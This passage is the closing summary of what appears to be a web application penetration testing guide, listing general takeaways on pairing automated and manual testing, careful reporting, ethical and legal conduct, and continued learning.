• Combine automated tools with manual testing techniques
• Proper documentation and reporting are as important as finding vulnerabilities
• Always follow ethical guidelines and legal requirements
• Continuous learning and practice are essential in cybersecurity

This guide provides a foundation for web application penetration testing. Remember that real-world applications often have unique characteristics and defenses, so adapt your approach accordingly and always prioritize ethical, responsible testing practices.
